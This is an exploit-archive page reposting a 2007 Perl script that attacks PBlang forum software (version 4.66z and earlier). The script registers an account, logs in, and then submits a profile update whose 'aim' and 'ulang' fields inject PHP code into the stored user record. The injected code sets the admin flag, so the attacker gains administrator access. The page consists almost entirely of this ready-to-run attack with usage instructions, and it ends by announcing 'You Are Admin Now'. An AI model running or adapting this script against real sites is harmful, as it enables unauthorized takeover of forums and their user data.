首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PBlang <= 4.66z Remote Create Admin Exploit
来源:www.Hessamx.Net 作者:Hessam-x 发布时间:2007-03-26  
#!/usr/bin/perl
# PBlang 4.66z Create Admin Exploit
# this exploit *register* a user with admin access
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;


$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#            PBLANG 4.66z Create Admin Exploit            #
#                    www.Hessamx.Net                      #
################# (C)oded By Hessam-x #####################

);



if (@ARGV < 3) {
print " #  usage : xpl.pl [host&path] [uname] [pass]\n";
print " #  e.g : xpl.pl www.milw0rm.com/pblang/ str0ke 123456\n";
exit();
}

   print " [~] User/Password : $uname/$passwd \n";
   print " [~] Host : $host \n";

$evilcode  = " \$userlocation=\"hell\"; \$userjoined=\"1174733561\"; \$userhomepage=\"http://\";";
$evilcode .= " \$useradmin=\"1\"; \$usermod=\"0\"; \$userban=\"0\"; \$userlastvisit=\"1174733561\";";
$evilcode .= " \$userlastpost=\"1174733561\"; \$userprevvisit=\"1174733561\"; \$useranimsmilies=\"\"; \$lastaliaschange=\"1174733549\"; /*";

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );

   #register
$reg = $xpl->post($url.'register.php?reg=2',
Content => [
"user" => $uname,
"pass" => $passwd,
"pass2" => $passwd,
"em" => 'evil@hell.com',
"realname" => 'evilcode',
"alias" => $uname,
"msn" => 'evilcode',
"icq" => 'evilcode',
"aim" => 'evilcode',
"yahoo" => 'evilcode',
"qq" => 'evilcode',
"web" => 'http://',
"loc" => 'hell',
"pt" => 'PBLang',
"av" => 'none',
"webav" =>'',
"sig" => 'be Safe',
"regcode" => '9999999999',
"lang" => 'en',
"accept" => '1',
"Submit" => 'Submit',
],);
   print " [~] registered ... \n";

$login = $xpl->post($url.'login.php?id=2',
Content => [
'user' => $uname,
'pass' => $passwd,
'Submit' => 'submit',
],);
$setcookie = $xpl->post($url.'setcookie.php?u='.$uname);
if($cookie_jar->as_string =~ /$uname/) {
   print " [~] Logined ... \n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}
$ecode = $xpl->post($url.'ucp.php?id=2&user='.$uname,
Content => [
"npass" => $passwd,
"npass2" => $passwd,
"oldpass" => $passwd,
"emhide" => 'hide',
"user" => $uname,
"em" => 'evil@hell.com',
"realname" => 'evilcode',
"alias" => $uname,
"msn" => 'evilcode',
"icq" => 'evilcode',
"aim" => 'evilcode\";'.$evilcode,
"yah" => 'evilcode',
"qq" => 'evilcode',
"web" => 'http://',
"loc" => 'hell',
"pt" => 'PBLang',
"av" => 'none',
"webav" =>'',
"sig" => '',
"regcode" => '1174733482',
"ulang" => '*/ \$userlang=\"en\"; //',
"accept" => '1',
"Submit2" => 'Submit',
],);


print " [+] You Are Admin Now !!";
print "\n #################################################### \n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mambo Module Flatmenu <= 1.07
·WarFTP 1.65 (USER) Remote Buff
·Microsoft DNS Server (Dynamic
·PHP < 4.4.5 / 5.2.1 _SESSION u
·0irc-client v1345 build2006082
·PHP < 4.4.5 / 5.2.1 _SESSION D
·PortailPhp 2.0 (idnews) Remote
·PBlang 4.66z Remote Code Execu
·FutureSoft TFTP Server 2000 Re
·Frontbase <= 4.2.7 Remote Buff
·Mercur Messaging 2005 SP3 IMAP
·PHP 5.2.1 with PECL phpDOC Loc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved